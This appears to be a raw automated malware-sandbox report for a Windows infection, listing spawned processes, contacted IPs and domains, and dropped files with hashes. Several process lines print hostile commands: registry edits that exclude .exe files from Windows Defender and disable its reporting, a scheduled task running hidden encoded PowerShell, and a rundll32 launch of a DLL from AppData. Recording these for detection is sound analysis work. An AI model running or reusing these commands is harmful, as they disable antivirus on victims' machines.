"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2188,6309549801319667691,357503778357398726,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5584 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2188,6309549801319667691,357503778357398726,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5920 /prefetch:1

C:\Users\Admin\AppData\Local\Temp\888B.exe

C:\Users\Admin\AppData\Local\Temp\888B.exe

C:\Users\Admin\AppData\Local\Temp\8B8A.exe

C:\Users\Admin\AppData\Local\Temp\8B8A.exe

C:\Users\Admin\AppData\Local\Temp\8D31.exe

C:\Users\Admin\AppData\Local\Temp\8D31.exe

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

"C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 1332 -ip 1332

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

C:\Users\Admin\AppData\Local\Temp\latestX.exe

"C:\Users\Admin\AppData\Local\Temp\latestX.exe"

C:\Users\Admin\AppData\Local\Temp\7zS9778.tmp\Install.exe

.\Install.exe

C:\Users\Admin\AppData\Local\Temp\kos4.exe

"C:\Users\Admin\AppData\Local\Temp\kos4.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1332 -s 784

C:\Users\Admin\AppData\Local\Temp\setup.exe

"C:\Users\Admin\AppData\Local\Temp\setup.exe"

C:\Users\Admin\AppData\Local\Temp\A32B.exe

C:\Users\Admin\AppData\Local\Temp\A32B.exe

C:\Users\Admin\AppData\Local\Temp\7zS9AF3.tmp\Install.exe

.\Install.exe /MKdidA "385119" /S

C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe

"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"

C:\Users\Admin\AppData\Local\Temp\is-T4QSL.tmp\LzmwAqmV.tmp

"C:\Users\Admin\AppData\Local\Temp\is-T4QSL.tmp\LzmwAqmV.tmp" /SL5="$801F4,6502186,54272,C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"

C:\Windows\SysWOW64\forfiles.exe

"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"

C:\Windows\SysWOW64\forfiles.exe

"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"

C:\Windows\SysWOW64\cmd.exe

/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&

C:\Windows\SysWOW64\cmd.exe

/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "gUBWoeRSz" /SC once /ST 02:36:26 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="

\??\c:\windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32

\??\c:\windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32

C:\Program Files (x86)\Drive Tools\zDriveTools.exe

"C:\Program Files (x86)\Drive Tools\zDriveTools.exe" -i

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\system32\schtasks.exe" /Delete /F /TN "Z1026-1"

\??\c:\windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64

C:\Program Files (x86)\Drive Tools\zDriveTools.exe

"C:\Program Files (x86)\Drive Tools\zDriveTools.exe" -s

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\system32\schtasks.exe" /Query

\??\c:\windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "gUBWoeRSz"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 5136 -ip 5136

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5136 -s 572

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\rundll32.exe

"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\006700e5a2ab05\clip64.dll, Main

C:\Users\Admin\AppData\Local\Temp\A62.exe

C:\Users\Admin\AppData\Local\Temp\A62.exe

Network

Country Destination Domain Proto
US 8.8.8.8:53 74.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 26.35.223.20.in-addr.arpa udp
FI 77.91.68.29:80 77.91.68.29 tcp
FI 77.91.68.249:80 77.91.68.249 tcp
US 8.8.8.8:53 29.68.91.77.in-addr.arpa udp
US 8.8.8.8:53 249.68.91.77.in-addr.arpa udp
RU 193.233.255.73:80 193.233.255.73 tcp
US 8.8.8.8:53 73.255.233.193.in-addr.arpa udp
RU 5.42.65.80:80 5.42.65.80 tcp
US 8.8.8.8:53 80.65.42.5.in-addr.arpa udp
FI 77.91.124.86:19084 tcp
FI 77.91.124.1:80 77.91.124.1 tcp
US 8.8.8.8:53 1.124.91.77.in-addr.arpa udp
US 8.8.8.8:53 www.facebook.com udp
NL 157.240.247.35:443 www.facebook.com tcp
US 8.8.8.8:53 accounts.google.com udp
NL 142.250.179.141:443 accounts.google.com tcp
US 8.8.8.8:53 35.247.240.157.in-addr.arpa udp
US 8.8.8.8:53 157.123.68.40.in-addr.arpa udp
NL 142.250.179.141:443 accounts.google.com udp
US 8.8.8.8:53 141.179.250.142.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 195.179.250.142.in-addr.arpa udp
N/A 224.0.0.251:5353 udp
US 8.8.8.8:53 196.168.217.172.in-addr.arpa udp
FI 77.91.124.86:19084 tcp
US 8.8.8.8:53 static.xx.fbcdn.net udp
IE 163.70.151.21:443 static.xx.fbcdn.net tcp
IE 163.70.151.21:443 static.xx.fbcdn.net tcp
US 8.8.8.8:53 21.151.70.163.in-addr.arpa udp
FI 77.91.68.29:80 77.91.68.29 tcp
NL 81.161.229.93:80 81.161.229.93 tcp
US 8.8.8.8:53 93.229.161.81.in-addr.arpa udp
US 8.8.8.8:53 14.36.251.142.in-addr.arpa udp
US 8.8.8.8:53 iplogger.com udp
DE 148.251.234.93:443 iplogger.com tcp
US 8.8.8.8:53 stim.graspalace.com udp
US 188.114.96.0:80 stim.graspalace.com tcp
FI 77.91.68.29:80 tcp
BG 171.22.28.213:80 171.22.28.213 tcp
US 8.8.8.8:53 93.234.251.148.in-addr.arpa udp
US 8.8.8.8:53 0.96.114.188.in-addr.arpa udp
US 8.8.8.8:53 213.28.22.171.in-addr.arpa udp
FI 77.91.124.86:19084 tcp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 facebook.com udp
IE 163.70.151.35:443 facebook.com tcp
US 8.8.8.8:53 35.151.70.163.in-addr.arpa udp
FI 77.91.124.86:19084 tcp
NL 142.251.36.14:443 udp
US 8.8.8.8:53 23.236.111.52.in-addr.arpa udp
FI 77.91.124.1:80 77.91.124.1 tcp
US 8.8.8.8:53 fbcdn.net udp
IE 163.70.151.35:443 fbcdn.net tcp
US 8.8.8.8:53 fbsbx.com udp
FI 77.91.68.29:80 77.91.68.29 tcp
FI 77.91.124.71:4341 tcp

Files

memory/2584-0-0x0000000000400000-0x0000000000409000-memory.dmp

memory/2584-1-0x0000000000400000-0x0000000000409000-memory.dmp

memory/3108-2-0x00000000029E0000-0x00000000029F6000-memory.dmp

memory/2584-3-0x0000000000400000-0x0000000000409000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\27C7.exe

MD5 01161c1325b36d158a54f7fa440694d9
SHA1 9a1a26689f96cb69dda63f4a78d0d57139e2216d
SHA256 b74ca29c3e1d156cfaf092f9398d0f75b8de65b9425a128e6ee9735679ec5a2a
SHA512 7aede95c129c92a9f84719b7815e9bedf0f11f70e0416d05926fa2f18e23b0677a23246ff594dae117be79ffa702a80806a50dbe57d6b3261a6cad71328e7b8b

C:\Users\Admin\AppData\Local\Temp\27C7.exe

MD5 01161c1325b36d158a54f7fa440694d9
SHA1 9a1a26689f96cb69dda63f4a78d0d57139e2216d
SHA256 b74ca29c3e1d156cfaf092f9398d0f75b8de65b9425a128e6ee9735679ec5a2a
SHA512 7aede95c129c92a9f84719b7815e9bedf0f11f70e0416d05926fa2f18e23b0677a23246ff594dae117be79ffa702a80806a50dbe57d6b3261a6cad71328e7b8b

C:\Users\Admin\AppData\Local\Temp\28A2.exe

MD5 e561df80d8920ae9b152ddddefd13c7c
SHA1 0d020453f62d2188f7a0e55442af5d75e16e7caf
SHA256 5484ca53027230772ae149e3d7684b7e322432ceb013b6bc2440bd3c269192ea
SHA512 a7afed5a6434f296f0e0186de8ce87245bbd0f264498e327188a93551dd45e0e67409e62f3477b526ab5b0927e4349ad66107cbea7f7554b4be53c18227741a5

C:\Users\Admin\AppData\Local\Temp\28A2.exe

MD5 e561df80d8920ae9b152ddddefd13c7c
SHA1 0d020453f62d2188f7a0e55442af5d75e16e7caf
SHA256 5484ca53027230772ae149e3d7684b7e322432ceb013b6bc2440bd3c269192ea
SHA512 a7afed5a6434f296f0e0186de8ce87245bbd0f264498e327188a93551dd45e0e67409e62f3477b526ab5b0927e4349ad66107cbea7f7554b4be53c18227741a5

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\ro3WO0Cp.exe

MD5 0fb75453e9d1ee53b30138070665c9a5
SHA1 db681d18e0acf63796a638ad33dd4eec73bfe5d6
SHA256 7a096fa97a25b6427a27be1db721566daa03096e9eb2b743a43563638461a00c
SHA512 c7f996c83296a085158a20b4dafd95b71f081d2b39ce5d000db4e79dcc5c733f816b394e83c42dc1a6dc01b6553662c8ab58d0493b170496e1d32fdc0a7503b3

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\ro3WO0Cp.exe

MD5 0fb75453e9d1ee53b30138070665c9a5
SHA1 db681d18e0acf63796a638ad33dd4eec73bfe5d6
SHA256 7a096fa97a25b6427a27be1db721566daa03096e9eb2b743a43563638461a00c
SHA512 c7f996c83296a085158a20b4dafd95b71f081d2b39ce5d000db4e79dcc5c733f816b394e83c42dc1a6dc01b6553662c8ab58d0493b170496e1d32fdc0a7503b3

C:\Users\Admin\AppData\Local\Temp\2A89.exe

MD5 73089952a99d24a37d9219c4e30decde
SHA1 8dfa37723afc72f1728ec83f676ffeac9102f8bd
SHA256 9aa54a5b73fe93d789ec1707ebd41ff824fcf6ba34b18d97ebc566cee8cbce60
SHA512 7088b995c0f6425ad4460b1f286d36e5b7ca3d79308febfac7f212e630b00569239e0b22455198739d20b1fbae1b70c24c22f41a34bab19a793aaa31164aa2d2

C:\Users\Admin\AppData\Local\Temp\299D.bat

MD5 403991c4d18ac84521ba17f264fa79f2
SHA1 850cc068de0963854b0fe8f485d951072474fd45
SHA256 ef6e942aefe925fefac19fa816986ea25de6935c4f377c717e29b94e65f9019f
SHA512 a20aaa77065d30195e5893f2ff989979383c8d7f82d9e528d4833b1c1236aef4f85284f5250d0f190a174790b650280ffe1fbff7e00c98024ccf5ca746e5b576

C:\Users\Admin\AppData\Local\Temp\2A89.exe

MD5 73089952a99d24a37d9219c4e30decde
SHA1 8dfa37723afc72f1728ec83f676ffeac9102f8bd
SHA256 9aa54a5b73fe93d789ec1707ebd41ff824fcf6ba34b18d97ebc566cee8cbce60
SHA512 7088b995c0f6425ad4460b1f286d36e5b7ca3d79308febfac7f212e630b00569239e0b22455198739d20b1fbae1b70c24c22f41a34bab19a793aaa31164aa2d2

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\dW9uy8Yx.exe

MD5 1c0f188479125e6b65f25b100348f336
SHA1 305f64656f03fb58f872b0639c9605e8f11433be
SHA256 f32a8dd3633ec70c80e3ba2c1093fd1ce2ffef45803456688010f76464a84b16
SHA512 1a6ab8c8a6262f03e5c2d68df719fc609644182e7924124627ce70dcd078d1f6ae23db6f3675159e07e09ab77b81f488b37d7eab2893b3716f5db45da65b2600

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\dW9uy8Yx.exe

MD5 1c0f188479125e6b65f25b100348f336
SHA1 305f64656f03fb58f872b0639c9605e8f11433be
SHA256 f32a8dd3633ec70c80e3ba2c1093fd1ce2ffef45803456688010f76464a84b16
SHA512 1a6ab8c8a6262f03e5c2d68df719fc609644182e7924124627ce70dcd078d1f6ae23db6f3675159e07e09ab77b81f488b37d7eab2893b3716f5db45da65b2600

C:\Users\Admin\AppData\Local\Temp\2B84.exe

MD5 d2ed05fd71460e6d4c505ce87495b859
SHA1 a970dfe775c4e3f157b5b2e26b1f77da7ae6d884
SHA256 3a119008fd025a394f6fb93a0c941e1dc0fa1f9c7606a674388f21d99dfe116f
SHA512 a15efc7c5ddd82ea612444b5df530d11da43bbaaf7f7ae4801c8063c8cffe4538cd47e27639e380b9d1c7e342575169e06af4b298a8faf635865dc4f9dc11b8e

C:\Users\Admin\AppData\Local\Temp\2B84.exe

MD5 d2ed05fd71460e6d4c505ce87495b859
SHA1 a970dfe775c4e3f157b5b2e26b1f77da7ae6d884
SHA256 3a119008fd025a394f6fb93a0c941e1dc0fa1f9c7606a674388f21d99dfe116f
SHA512 a15efc7c5ddd82ea612444b5df530d11da43bbaaf7f7ae4801c8063c8cffe4538cd47e27639e380b9d1c7e342575169e06af4b298a8faf635865dc4f9dc11b8e

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\ni8Zb1nN.exe

MD5 46ac23136148f718bf54755d61bcd211
SHA1 2ba02fdc8cbd3897d8b9a0dcefba1cfbbbeed74d
SHA256 e9350f2b260426ef7dceb2fca98327b9679834ea011378eea1d6be420370d34c
SHA512 84f0e547c297a7a659e5e558a605495a0873f783878e56fe926b35ee055b509e71783954d8ccbe2a53b45a20b3f894622f932c3104c543f00f9714a9cff8ad3f

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\ni8Zb1nN.exe

MD5 46ac23136148f718bf54755d61bcd211
SHA1 2ba02fdc8cbd3897d8b9a0dcefba1cfbbbeed74d
SHA256 e9350f2b260426ef7dceb2fca98327b9679834ea011378eea1d6be420370d34c
SHA512 84f0e547c297a7a659e5e558a605495a0873f783878e56fe926b35ee055b509e71783954d8ccbe2a53b45a20b3f894622f932c3104c543f00f9714a9cff8ad3f

C:\Users\Admin\AppData\Local\Temp\2C6F.exe

MD5 4bd59a6b3207f99fc3435baf3c22bc4e
SHA1 ae90587beed289f177f4143a8380ba27109d0a6f
SHA256 08e33db08288da47bbbe3a8d65a59e8536b05c464ba91dc66e08f9abd245e236
SHA512 ca7517384a5449145a819e45445ff9bbcb27ea1b9e2a63c13ef12e256475e0ccbf05031b5ab5cb83a24b2cdd37d425cc7b9044c660098d39f47f05e95bbb6324

C:\Users\Admin\AppData\Local\Temp\2C6F.exe

MD5 4bd59a6b3207f99fc3435baf3c22bc4e
SHA1 ae90587beed289f177f4143a8380ba27109d0a6f
SHA256 08e33db08288da47bbbe3a8d65a59e8536b05c464ba91dc66e08f9abd245e236
SHA512 ca7517384a5449145a819e45445ff9bbcb27ea1b9e2a63c13ef12e256475e0ccbf05031b5ab5cb83a24b2cdd37d425cc7b9044c660098d39f47f05e95bbb6324

memory/1268-60-0x0000000000B30000-0x0000000000B3A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\ZJ3VJ7hO.exe

MD5 8f9ec68001fe8c9872a4d345f1038913
SHA1 db3a4408ab60f3155531b5588c76c810d054aa1e
SHA256 ee92a49d65e8b5f367a18d0d864f90790676ce038321ba6d54475f41c71c7e9d
SHA512 fb0fbe58a3c7e1d2deb91a604afe97fa68d8a2fdf854b04e827447436909f0a71e5c5e3ec44cf0c54717a64bdaa608e87ec19d4c36bfd2fa054b29b1e81d399c

memory/4612-66-0x0000000073440000-0x0000000073BF0000-memory.dmp

memory/4612-67-0x00000000004E0000-0x000000000051E000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\2E26.exe

MD5 329bce2e07f7898910e3fd4e17b98d42
SHA1 94d379a5964c97eefad6432608dd09b4ddb12b77
SHA256 3c78b3067a13c0c8980f0cc9cac0c8d5a2ac8400c259405eebb907f3f7da349e
SHA512 a3eaf12d4d6fffbae622ba50afef0eba19b24f25d3f6706abb5b4e8d7c05e3b0da6b2a4f0a0daa48d026ef4fc8205746cad90daff2d2a47edc7a90446649e7f2

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\ZJ3VJ7hO.exe

MD5 8f9ec68001fe8c9872a4d345f1038913
SHA1 db3a4408ab60f3155531b5588c76c810d054aa1e
SHA256 ee92a49d65e8b5f367a18d0d864f90790676ce038321ba6d54475f41c71c7e9d
SHA512 fb0fbe58a3c7e1d2deb91a604afe97fa68d8a2fdf854b04e827447436909f0a71e5c5e3ec44cf0c54717a64bdaa608e87ec19d4c36bfd2fa054b29b1e81d399c

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

MD5 4bd59a6b3207f99fc3435baf3c22bc4e
SHA1 ae90587beed289f177f4143a8380ba27109d0a6f
SHA256 08e33db08288da47bbbe3a8d65a59e8536b05c464ba91dc66e08f9abd245e236
SHA512 ca7517384a5449145a819e45445ff9bbcb27ea1b9e2a63c13ef12e256475e0ccbf05031b5ab5cb83a24b2cdd37d425cc7b9044c660098d39f47f05e95bbb6324

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1Yv41KG8.exe

MD5 59dae5fe6ffa1a540dd6afc7f438115c
SHA1 f6eba4e7b7c3d815e1d5bc02226ed33adb16ae07
SHA256 026954d379163858506b4e84e8e04d951beedb8514ef127e4f64b46a10b67784
SHA512 c04877b6c5dc04615c7d251d960d7d145a7e859e2c987b6c736207bd3110a319e42f2555c80d1a524d0c470d14060acaa8538fa764ec50e86544771324641170

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1Yv41KG8.exe

MD5 59dae5fe6ffa1a540dd6afc7f438115c
SHA1 f6eba4e7b7c3d815e1d5bc02226ed33adb16ae07
SHA256 026954d379163858506b4e84e8e04d951beedb8514ef127e4f64b46a10b67784
SHA512 c04877b6c5dc04615c7d251d960d7d145a7e859e2c987b6c736207bd3110a319e42f2555c80d1a524d0c470d14060acaa8538fa764ec50e86544771324641170

memory/1268-77-0x0000000073440000-0x0000000073BF0000-memory.dmp

memory/4612-78-0x0000000007750000-0x0000000007CF4000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\2E26.exe

MD5 329bce2e07f7898910e3fd4e17b98d42
SHA1 94d379a5964c97eefad6432608dd09b4ddb12b77
SHA256 3c78b3067a13c0c8980f0cc9cac0c8d5a2ac8400c259405eebb907f3f7da349e
SHA512 a3eaf12d4d6fffbae622ba50afef0eba19b24f25d3f6706abb5b4e8d7c05e3b0da6b2a4f0a0daa48d026ef4fc8205746cad90daff2d2a47edc7a90446649e7f2

memory/4612-81-0x0000000007280000-0x0000000007312000-memory.dmp

memory/4612-82-0x0000000007210000-0x0000000007220000-memory.dmp

memory/4612-87-0x0000000007410000-0x000000000741A000-memory.dmp

memory/2232-88-0x0000000000400000-0x000000000047E000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

MD5 4bd59a6b3207f99fc3435baf3c22bc4e
SHA1 ae90587beed289f177f4143a8380ba27109d0a6f
SHA256 08e33db08288da47bbbe3a8d65a59e8536b05c464ba91dc66e08f9abd245e236
SHA512 ca7517384a5449145a819e45445ff9bbcb27ea1b9e2a63c13ef12e256475e0ccbf05031b5ab5cb83a24b2cdd37d425cc7b9044c660098d39f47f05e95bbb6324

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

MD5 4bd59a6b3207f99fc3435baf3c22bc4e
SHA1 ae90587beed289f177f4143a8380ba27109d0a6f
SHA256 08e33db08288da47bbbe3a8d65a59e8536b05c464ba91dc66e08f9abd245e236
SHA512 ca7517384a5449145a819e45445ff9bbcb27ea1b9e2a63c13ef12e256475e0ccbf05031b5ab5cb83a24b2cdd37d425cc7b9044c660098d39f47f05e95bbb6324

memory/4612-96-0x0000000008320000-0x0000000008938000-memory.dmp

memory/4612-98-0x00000000074F0000-0x0000000007502000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\2E26.exe

MD5 329bce2e07f7898910e3fd4e17b98d42
SHA1 94d379a5964c97eefad6432608dd09b4ddb12b77
SHA256 3c78b3067a13c0c8980f0cc9cac0c8d5a2ac8400c259405eebb907f3f7da349e
SHA512 a3eaf12d4d6fffbae622ba50afef0eba19b24f25d3f6706abb5b4e8d7c05e3b0da6b2a4f0a0daa48d026ef4fc8205746cad90daff2d2a47edc7a90446649e7f2

memory/4612-102-0x0000000007550000-0x000000000758C000-memory.dmp

memory/2232-101-0x0000000073440000-0x0000000073BF0000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\2E26.exe

MD5 329bce2e07f7898910e3fd4e17b98d42
SHA1 94d379a5964c97eefad6432608dd09b4ddb12b77
SHA256 3c78b3067a13c0c8980f0cc9cac0c8d5a2ac8400c259405eebb907f3f7da349e
SHA512 a3eaf12d4d6fffbae622ba50afef0eba19b24f25d3f6706abb5b4e8d7c05e3b0da6b2a4f0a0daa48d026ef4fc8205746cad90daff2d2a47edc7a90446649e7f2

memory/4612-103-0x00000000076D0000-0x000000000771C000-memory.dmp

memory/4612-97-0x00000000075C0000-0x00000000076CA000-memory.dmp

memory/2232-89-0x0000000000480000-0x00000000004DA000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 6276613a51dae3b747451bc05e24edfa
SHA1 96ff591013fc8d378a9b37ea580d8ec6e98bbde5
SHA256 d17c0519716f5fa61ccf7289220c5e8917a36fbb29e48a86bb1122c9e3fcafb0
SHA512 dc84cd5df4867849039ecea2c98b1aeb435399b9503b1384159b2d08fe180b9f3daadc98f55c6ab28faa1e66dea8abfa4e702232a7027d933b0eca91fcf6b5f3

memory/2232-113-0x0000000000400000-0x000000000047E000-memory.dmp

memory/2232-114-0x0000000073440000-0x0000000073BF0000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 6276613a51dae3b747451bc05e24edfa
SHA1 96ff591013fc8d378a9b37ea580d8ec6e98bbde5
SHA256 d17c0519716f5fa61ccf7289220c5e8917a36fbb29e48a86bb1122c9e3fcafb0
SHA512 dc84cd5df4867849039ecea2c98b1aeb435399b9503b1384159b2d08fe180b9f3daadc98f55c6ab28faa1e66dea8abfa4e702232a7027d933b0eca91fcf6b5f3

memory/4612-128-0x0000000073440000-0x0000000073BF0000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 6276613a51dae3b747451bc05e24edfa
SHA1 96ff591013fc8d378a9b37ea580d8ec6e98bbde5
SHA256 d17c0519716f5fa61ccf7289220c5e8917a36fbb29e48a86bb1122c9e3fcafb0
SHA512 dc84cd5df4867849039ecea2c98b1aeb435399b9503b1384159b2d08fe180b9f3daadc98f55c6ab28faa1e66dea8abfa4e702232a7027d933b0eca91fcf6b5f3

memory/1268-134-0x0000000073440000-0x0000000073BF0000-memory.dmp

\??\pipe\LOCAL\crashpad_5032_VNZBGPHQDSRPURLO

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

memory/1268-151-0x0000000073440000-0x0000000073BF0000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 d0036362232378f7e203464dfa05a116
SHA1 2d3fcb553cac133e75f65edc6022bb6aefe297b2
SHA256 7ec0081009d42d8499ac552aa9c6f6acc7cbb903ba6fc151241fd8adaffa05ac
SHA512 58ef4400c0f283c8a1a7ecc4356023de09f41eb61e2589788419383a5b4b995494e485ed7c7de0ea70c71002c495d4d4632f2ac7bde4890270dd72d7c115d2e2

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 6276613a51dae3b747451bc05e24edfa
SHA1 96ff591013fc8d378a9b37ea580d8ec6e98bbde5
SHA256 d17c0519716f5fa61ccf7289220c5e8917a36fbb29e48a86bb1122c9e3fcafb0
SHA512 dc84cd5df4867849039ecea2c98b1aeb435399b9503b1384159b2d08fe180b9f3daadc98f55c6ab28faa1e66dea8abfa4e702232a7027d933b0eca91fcf6b5f3

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 1f6109e3f423fe5174c004feabaa5ff4
SHA1 d043a2bd5898c1e8a4831bb22e925fcf49916066
SHA256 e407b570f70d8508aad100afa7c08b270449ebece553c3ecfcd674d397b7c79a
SHA512 674a9f8fdf3fed90a945d0c828b6a433a892172e8f4cb979506cc11ed070f7b988cd78b451fecaa18ed640a2910417db40dafb29a77ec5c879fef3205bd5049e

memory/4612-173-0x0000000007210000-0x0000000007220000-memory.dmp

memory/4696-195-0x0000000000400000-0x0000000000434000-memory.dmp

memory/4696-196-0x0000000000400000-0x0000000000434000-memory.dmp

memory/4696-197-0x0000000000400000-0x0000000000434000-memory.dmp

memory/4696-200-0x0000000000400000-0x0000000000434000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\2sA143dW.exe

MD5 03875b6a92cc34e07d66d778c49723c9
SHA1 4ed6f143de7a8533eadb89df81ff8be011adc6a0
SHA256 debd7833fc2657b4da903739cccc5972633bee4243d386fff26c6d7aad86c670
SHA512 960ecd13c324b826982d8fa2a4bb45f3731f05f3c92474135ca5be3d901bc4d8747417c69fb94a6abde7e5463f3c7276026c2e74fb17dd1b0edab704b7927bf7

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\2sA143dW.exe

MD5 03875b6a92cc34e07d66d778c49723c9
SHA1 4ed6f143de7a8533eadb89df81ff8be011adc6a0
SHA256 debd7833fc2657b4da903739cccc5972633bee4243d386fff26c6d7aad86c670
SHA512 960ecd13c324b826982d8fa2a4bb45f3731f05f3c92474135ca5be3d901bc4d8747417c69fb94a6abde7e5463f3c7276026c2e74fb17dd1b0edab704b7927bf7

memory/552-203-0x0000000000430000-0x000000000046E000-memory.dmp

memory/552-204-0x0000000073440000-0x0000000073BF0000-memory.dmp

